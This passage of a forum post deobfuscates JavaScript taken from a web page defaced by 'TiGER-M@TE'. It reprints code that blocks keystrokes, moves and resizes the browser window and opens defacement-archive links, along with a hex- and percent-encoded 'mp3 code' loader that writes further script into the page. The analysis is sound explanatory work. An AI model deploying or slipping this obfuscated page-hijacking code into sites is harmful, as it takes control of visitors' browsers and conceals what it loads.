x68\x71\x77\x31\x77\x6C\x77\x6F\x68\x25\x32\x38\x35\x34\x25\x32\x38\x36\x47\x25\x32\x38\x35\x25\x33\x41\x4B\x64\x66\x6E\x68\x47\x25\x32\x38\x35\x33\x45\x25\x37\x43\x25\x32\x38\x35\x33\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x25\x33\x41\x45\x68\x25\x37\x42\x6C\x77\x25\x32\x38\x35\x25\x33\x42\x33\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x25\x33\x41\x47\x25\x32\x38\x33\x44\x67\x72\x66\x78\x70\x68\x71\x77\x31\x7A\x75\x6C\x77\x68\x25\x32\x38\x35\x25\x33\x42\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x36\x46\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x35\x33\x69\x75\x64\x70\x68\x65\x72\x75\x67\x68\x75\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x37\x33\x37\x31\x73\x6B\x73\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x68\x70\x65\x68\x67\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x45\x25\x37\x43\x62\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x36\x49\x76\x72\x78\x71\x67\x76\x7A\x69\x25\x32\x38\x36\x47\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x35\x39\x64\x78\x77\x72\x73\x6F\x64\x25\x37\x43\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x39\x6F\x72\x72\x73\x76\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x77\x25\x37\x43\x73\x68\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x64\x73\x73\x6F\x6C\x66\x64\x77\x6C\x72\x71\x32\x25\x37\x42\x30\x76\x6B\x72\x66\x6E\x7A\x64\x79\x68\x30\x69\x6F\x64\x76\x6B\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x68\x70\x65\x68\x67\x25\x32\x38\x36\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x36\x46\x32\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x33"];document[_0xd8af[1]](unescape(_0xd8af[0]));dF(_0xd8af[2]);</script>

<!-- mp3 code ended -->

</html>






We'll first decode this section of text:
Code: Select all
var _0x8ae2=["\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x6F\x70\x65\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45\x2F\x73\x70\x65\x63\x69\x61\x6C\x3D\x31","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6D\x67\x74\x66\x79\x2E\x63\x6F\x6D\x2F\x3F\x71\x3D\x48\x61\x63\x6B\x65\x64\x20\x62\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x73\x63\x72\x6F\x6C\x6C\x42\x79","\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x6F\x6E\x6B\x65\x79\x64\x6F\x77\x6E","\x72\x65\x73\x69\x7A\x65\x54\x6F","\x6D\x6F\x76\x65\x54\x6F","\x6D\x6F\x76\x65\x28\x29","\x72\x6F\x75\x6E\x64","\x66\x67\x43\x6F\x6C\x6F\x72","\x62\x67\x43\x6F\x6C\x6F\x72","\x4C\x4F\x4C","\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68","\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74"];


Which turns into:

Code: Select all
var _0x8ae2=[
"http://zone-h.org/archive/notifier=TiGER-M@TE",
"open",
"http://zone-h.org/archive/notifier=TiGER-M@TE/special=1",
"http://lmgtfy.com/?q=Hacked by TiGER-M@TE",
"scrollBy",
"title",
"HackeD By TiGER-M@TE",
"onkeydown",
"resizeTo",
"moveTo",
"move()",
"round",
"fgColor",
"bgColor",
"LOL",
"availWidth",
"availHeight"
];

This is just an array of data.





Next, we have this set of text:
Code: Select all
function details(){window[_0x8ae2[1]](_0x8ae2[0]);window[_0x8ae2[1]](_0x8ae2[2]);window[_0x8ae2[1]](_0x8ae2[3]);} ;window[_0x8ae2[4]](0,1);if(document[_0x8ae2[5]]==_0x8ae2[6]){function keypressed(){return false;} ;document[_0x8ae2[7]]=keypressed;window[_0x8ae2[8]](0,0);window[_0x8ae2[9]](0,0);setTimeout(_0x8ae2[10],2);var mxm=50;var mym=25;var mx=0;var my=0;var sv=50;var status=1;var szx=0;var szy=0;var c=255;var n=0;var sm=30;var cycle=2;var done=2;function move(){if(status==1){mxm=mxm/1.05;mym=mym/1.05;mx=mx+mxm;my=my-mym;mxm=mxm+(400-mx)/100;mym=mym-(300-my)/100;window[_0x8ae2[9]](mx,my);rmxm=Math[_0x8ae2[11]](mxm/10);rmym=Math[_0x8ae2[11]](mym/10);if(rmxm==0){if(rmym==0){status=2;} ;} ;} ;if(status==2){sv=sv/1.1;scrratio=1+1/3;mx=mx-sv*scrratio/2;my=my-sv/2;szx=szx+sv*scrratio;szy=szy+sv;window[_0x8ae2[9]](mx,my);window[_0x8ae2[8]](szx,szy);if(sv<0.1){status=3;} ;} ;if(status==3){document[_0x8ae2[12]]=0xffffFF;c=c-16;if(c<0){status=8;} ;} ;if(status==4){c=c+16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>239){status=5;} ;} ;if(status==5){c=c-16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c<0){status=6;cycle=cycle-1;if(cycle>0){if(done==1){status=7;} else {status=4;} ;} ;} ;} ;if(status==6){document[_0x8ae2[5]]=_0x8ae2[14];alert(_0x8ae2[14]);cycle=2;status=4;done=1;} ;if(status==7){c=c+4;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>128){status=8;} ;} ;if(status==8){window[_0x8ae2[9]](0,0);sx=screen[_0x8ae2[15]];sy=screen[_0x8ae2[16]];window[_0x8ae2[8]](sx,sy);status=9;} ;var _0xceebx11=setTimeout(_0x8ae2[10],0.3);} ;} ;


When you take the time to clean this code up, it looks more like this:
Code: Select all
function details()
{
   window[_0x8ae2[1]](_0x8ae2[0]);

   window[_0x8ae2[1]](_0x8ae2[2]);

   window[_0x8ae2[1]](_0x8ae2[3]);
}

window[_0x8ae2[4]](0,1);

if(document[_0x8ae2[5]]==_0x8ae2[6])
{
   function keypressed(){return false;};

   document[_0x8ae2[7]]=keypressed;

   window[_0x8ae2[8]](0,0);

   window[_0x8ae2[9]](0,0);

   setTimeout(_0x8ae2[10],2);

   var mxm=50;
   var mym=25;
   var mx=0;
   var my=0;
   var sv=50;
   var status=1;
   var szx=0;
   var szy=0;
   var c=255;
   var n=0;
   var sm=30;
   var cycle=2;
   var done=2;

   function move()
   {
      if(status==1)
      {
         mxm=mxm/1.05;
         mym=mym/1.05;
         mx=mx+mxm;
         my=my-mym;
         mxm=mxm+(400-mx)/100;
         mym=mym-(300-my)/100;
         window[_0x8ae2[9]](mx,my);
         rmxm=Math[_0x8ae2[11]](mxm/10);
         rmym=Math[_0x8ae2[11]](mym/10);

         if(rmxm==0)
         {
            if(rmym==0)
            {
               status=2;
            }
         }
      }

      if(status==2)
      {
         sv=sv/1.1;
         scrratio=1+1/3;
         mx=mx-sv*scrratio/2;
         my=my-sv/2;
         szx=szx+sv*scrratio;
         szy=szy+sv;
         window[_0x8ae2[9]](mx,my);
         window[_0x8ae2[8]](szx,szy);

         if(sv<0.1)
         {
            status=3;
         }
      }

      if(status==3)
      {
         document[_0x8ae2[12]]=0xffffFF;
         c=c-16;

         if(c<0)
         {
            status=8;
         }
      }

      if(status==4)
      {
         c=c+16;
         document[_0x8ae2[13]]=c*65536;
         document[_0x8ae2[12]]=(255-c)*65536;

         if(c>239)
         {
            status=5;
         }
      }

      if(status==5)
      {
         c=c-16;
         document[_0x8ae2[13]]=c*65536;
         document[_0x8ae2[12]]=(255-c)*65536;

         if(c<0)
         {
            status=6;
            cycle=cycle-1;

            if(cycle>0)
            {
               if(done==1)
               {
                  status=7;
               }
               else
               {
                  status=4;
               }
            }
         }
      }

      if(status==6)
      {
         document[_0x8ae2[5]]=_0x8ae2[14];
         alert(_0x8ae2[14]);
         cycle=2;
         status=4;
         done=1;
      }

      if(status==7)
      {
         c=c+4;
         document[_0x8ae2[13]]=c*65536;
         document[_0x8ae2[12]]=(255-c)*65536;

         if(c>128)
         {
            status=8;
         }
      }

      if(status==8)
      {
         window[_0x8ae2[9]](0,0);
         sx=screen[_0x8ae2[15]];
         sy=screen[_0x8ae2[16]];
         window[_0x8ae2[8]](sx,sy);
         status=9;
      }

      var _0xceebx11=setTimeout(_0x8ae2[10],0.3)
   }
}

This appears to be the javascript code that dances around the screen.




We also have this set of code:
Code: Select all
<script>var l1n3='<img src="data:image/gif;base64,R0lGODlhqAABAOYAAAMDA3d4eAAAAAICAfLy8l5dXaWlpSQlJBwcHBQVFBISEQ0NDbu7u/v8/EJBQePj4/3+/T4+PtjX2Do7OlZWVyEiIjc3N09PT4OEhIB/f/r6+sjIyMTExPb29rS0tHx7fOvr64+Pj4eHh56dnZqZmvT09GVlZejp6dXU1aGhoeXm5khISJKTk93e3hkZGQcHB0RFRBcXF+7u7isqKi4uLmxtbLe3t6ysrXR0dTQ0M87Ozw8QEMvLy6ipqQUFBUxMTAkJCdHS0vDw73BwcQsLCycnJ/j4+JeXl8HBwmFhYVNSU+Dg4Glpadvb2jEwML6+vrCvsB8fH4uLi1pZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAACoAAEAAAewgBANGkYdJQRCMiAnKg9LLU0SKEE6PBscSE8MNh5QNz0GKSMkRywhUiIYGR8BOEM1TCZJBVMUShc/KzAOERMWOU40M0UHFVEILjEJCjsLREAvPgADAgIDAD4vQEQLOwoJMS4IURUHRTM0TjkWExEOMCs/F0oUUwVJJkw1QzgBHxkYREgJweIIiREpDPS4AcWDDQZPkHDYwENHEBQSmrRY8kDFCRAyhBAo0cGIhgYQAgEAOw==" />';
document.write(l1n3+l1n3);

This bit of code simply prints an image to the screen, it is a black gradient divider. You can put this in an html file on your desktop and test.




Next, we have:
Code: Select all
<script>if (navigator.appName == 'Microsoft Internet Explorer'){document.write('<font face="Arial Black" size="5" color="#FF0000">');}else{document.write('<font face="Arial Black" size="5" color="black" style="text-shadow:#FFFFFF 2px 2px 5px">');}</script>


cleaned up, it looks more like this:
Code: Select all
if (navigator.appName == 'Microsoft Internet Explorer')
{
   document.write('
      <font face="Arial Black" size="5" color="#FF0000">
   ')
}
else
{
   document.write('
      <font face="Arial Black" size="5" color="black" style="text-shadow:#FFFFFF 2px 2px 5px">
   ')
}


Because Internet Explorer does not support all css styles that firefox and other, better browsers do, it is simple if statement. If the user is using Internet Explorer, print this, otherwise print that.






Next we have:
Code: Select all
<script>var _0x9355=["\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x6F\x74\x6F\x6E\x6F\x6E\x73\x2E\x72\x75\x2F\x69\x6D\x61\x67\x65\x73\x2F\x31\x37\x2E\x30\x33\x2E\x31\x31\x2F\x62\x79\x74\x69\x67\x65\x72\x6D\x74\x65\x2E\x6A\x70\x67\x22\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x74\x68\x69\x73\x2E\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x6E\x75\x6C\x6C\x3B\x74\x68\x69\x73\x2E\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x69\x6D\x61\x67\x65\x2E\x62\x61\x79\x69\x6D\x67\x2E\x63\x6F\x6D\x2F\x6D\x61\x65\x61\x64\x61\x61\x64\x69\x2E\x6A\x70\x67\x27\x3B\x22\x20\x2F\x3E","\x77\x72\x69\x74\x65"];if(document[_0x9355[0]]!=_0x9355[1]){exit(0);} ;document[_0x9355[3]](_0x9355[2]);</script>


cleaned up, it looks like this:
Code: Select all
var _0x9355=[
   "title",
   "HackeD By TiGER-M@TE",
   "<img src="http://www.fotonons.ru/images/17.03.11/bytigermte.jpg" onerror="this.onerror=null;this.src='http://image.bayimg.com/maeadaadi.jpg';" />",
   "write"
];

if(document[_0x9355[0]]!=_0x9355[1])
{
   exit(0);
}
document[_0x9355[3]](_0x9355[2]);

Again, this is nothing more than an array of data. For example, he uses the variables here to set the "title" of the html page to "HackeD By TiGER-M@TE".





Finally, we have this:
Code: Select all
<!-- mp3 code starts from here,feel free to copy/paste -->

<script language="javascript">var _0xd8af=["\x25\x33\x43\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x30\x25\x36\x43\x25\x36\x31\x25\x36\x45\x25\x36\x37\x25\x37\x35\x25\x36\x31\x25\x36\x37\x25\x36\x35\x25\x33\x44\x25\x32\x32\x25\x36\x41\x25\x36\x31\x25\x37\x36\x25\x36\x31\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x32\x25\x33\x45\x25\x36\x36\x25\x37\x35\x25\x36\x45\x25\x36\x33\x25\x37\x34\x25\x36\x39\x25\x36\x46\x25\x36\x45\x25\x32\x30\x25\x36\x34\x25\x34\x36\x25\x32\x38\x25\x37\x33\x25\x32\x39\x25\x37\x42\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x33\x25\x33\x31\x25\x33\x44\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x33\x30\x25\x32\x43\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x32\x30\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x34\x25\x33\x44\x25\x32\x37\x25\x32\x37\x25\x33\x42\x25\x36\x36\x25\x36\x46\x25\x37\x32\x25\x32\x38\x25\x36\x39\x25\x33\x44\x25\x33\x30\x25\x33\x42\x25\x36\x39\x25\x33\x43\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x33\x42\x25\x36\x39\x25\x32\x42\x25\x32\x42\x25\x32\x39\x25\x37\x34\x25\x32\x42\x25\x33\x44\x25\x35\x33\x25\x37\x34\x25\x37\x32\x25\x36\x39\x25\x36\x45\x25\x36\x37\x25\x32\x45\x25\x36\x36\x25\x37\x32\x25\x36\x46\x25\x36\x44\x25\x34\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x34\x31\x25\x37\x34\x25\x32\x38\x25\x36\x39\x25\x32\x39\x25\x32\x44\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x43\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x36\x34\x25\x36\x46\x25\x36\x33\x25\x37\x35\x25\x36\x44\x25\x36\x35\x25\x36\x45\x25\x37\x34\x25\x32\x45\x25\x37\x37\x25\x37\x32\x25\x36\x39\x25\x37\x34\x25\x36\x35\x25\x32\x38\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x34\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x37\x44\x25\x33\x43\x25\x32\x46\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x33\x45","\x77\x72\x69\x74\x65","\x25\x32\x38\x36\x46\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x6C\x69\x25\x32\x38\x35\x25\x33\x42\x67\x72\x66\x78\x70\x68\x71\x77\x31\x77\x6C\x77\x6F\x68\x25\x32\x38\x35\x34\x25\x32\x38\x36\x47\x25\x32\x38\x35\x25\x33\x41\x4B\x64\x66\x6E\x68\x47\x25\x32\x38\x35\x33\x45\x25\x37\x43\x25\x32\x38\x35\x33\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x25\x33\x41\x45\x68\x25\x37\x42\x6C\x77\x25\x32\x38\x35\x25\x33\x42\x33\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x25\x33\x41\x47\x25\x32\x38\x33\x44\x67\x72\x66\x78\x70\x68\x71\x77\x31\x7A\x75\x6C\x77\x68\x25\x32\x38\x35\x25\x33\x42\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x36\x46\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x35\x33\x69\x75\x64\x70\x68\x65\x72\x75\x67\x68\x75\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x37\x33\x37\x31\x73\x6B\x73\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x68\x70\x65\x68\x67\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x45\x25\x37\x43\x62\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x36\x49\x76\x72\x78\x71\x67\x76\x7A\x69\x25\x32\x38\x36\x47\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x35\x39\x64\x78\x77\x72\x73\x6F\x64\x25\x37\x43\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x39\x6F\x72\x72\x73\x76\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x77\x25\x37\x43\x73\x68\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x64\x73\x73\x6F\x6C\x66\x64\x77\x6C\x72\x71\x32\x25\x37\x42\x30\x76\x6B\x72\x66\x6E\x7A\x64\x79\x68\x30\x69\x6F\x64\x76\x6B\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x68\x70\x65\x68\x67\x25\x32\x38\x36\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x36\x46\x32\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x33"];document[_0xd8af[1]](unescape(_0xd8af[0]));dF(_0xd8af[2]);</script>

<!-- mp3 code ended -->




When this code is cleaned up, we see:
Code: Select all
<!-- mp3 code starts from here,feel free to copy/paste -->

<script language="javascript">

var _0xd8af=[
   "\x25\x33\x43\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x30\x25\x36\x43\x25\x36\x31\x25\x36\x45\x25\x36\x37\x25\x37\x35\x25\x36\x31\x25\x36\x37\x25\x36\x35\x25\x33\x44\x25\x32\x32\x25\x36\x41\x25\x36\x31\x25\x37\x36\x25\x36\x31\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x32\x25\x33\x45\x25\x36\x36\x25\x37\x35\x25\x36\x45\x25\x36\x33\x25\x37\x34\x25\x36\x39\x25\x36\x46\x25\x36\x45\x25\x32\x30\x25\x36\x34\x25\x34\x36\x25\x32\x38\x25\x37\x33\x25\x32\x39\x25\x37\x42\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x33\x25\x33\x31\x25\x33\x44\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x33\x30\x25\x32\x43\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x32\x30\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x34\x25\x33\x44\x25\x32\x37\x25\x32\x37\x25\x33\x42\x25\x36\x36\x25\x36\x46\x25\x37\x32\x25\x32\x38\x25\x36\x39\x25\x33\x44\x25\x33\x30\x25\x33\x42\x25\x36\x39\x25\x33\x43\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x33\x42\x25\x36\x39\x25\x32\x42\x25\x32\x42\x25\x32\x39\x25\x37\x34\x25\x32\x42\x25\x33\x44\x25\x35\x33\x25\x37\x34\x25\x37\x32\x25\x36\x39\x25\x36\x45\x25\x36\x37\x25\x32\x45\x25\x36\x36\x25\x37\x32\x25\x36\x46\x25\x36\x44\x25\x34\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x34\x31\x25\x37\x34\x25\x32\x38\x25\x36\x39\x25\x32\x39\x25\x32\x44\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x43\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x36\x34\x25\x36\x46\x25\x36\x33\x25\x37\x35\x25\x36\x44\x25\x36\x35\x25\x36\x45\x25\x37\x34\x25\x32\x45\x25\x37\x37\x25\x37\x32\x25\x36\x39\x25\x37\x34\x25\x36\x35\x25\x32\x38\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x34\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x37\x44\x25\x33\x43\x25\x32\x46\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x33\x45",
   "\x77\x72\x69\x74\x65",
   "\x25\x32\x38\x36\x46\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x6C\x69\x25\x32\x38\x35\x25\x33\x42\x67\x72\x66\x78\x70\x68\x71\x77\x31\x77\x6C\x77\x6F\x68\x25\x32\x38\x35\x34\x25\x32\x38\x36\x47\x25\x32\x38\x35\x25\x33\x41\x4B\x64\x66\x6E\x68\x47\x25\x32\x38\x35\x33\x45\x25\x37\x43\x25\x32\x38\x35\x33\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x25\x33\x41\x45\x68\x25\x37\x42\x6C\x77\x25\x32\x38\x35\x25\x33\x42\x33\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x25\x33\x41\x47\x25\x32\x38\x33\x44\x67\x72\x66\x78\x70\x68\x71\x77\x31\x7A\x75\x6C\x77\x68\x25\x32\x38\x35\x25\x33\x42\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x36\x46\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x35\x33\x69\x75\x64\x70\x68\x65\x72\x75\x67\x68\x75\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C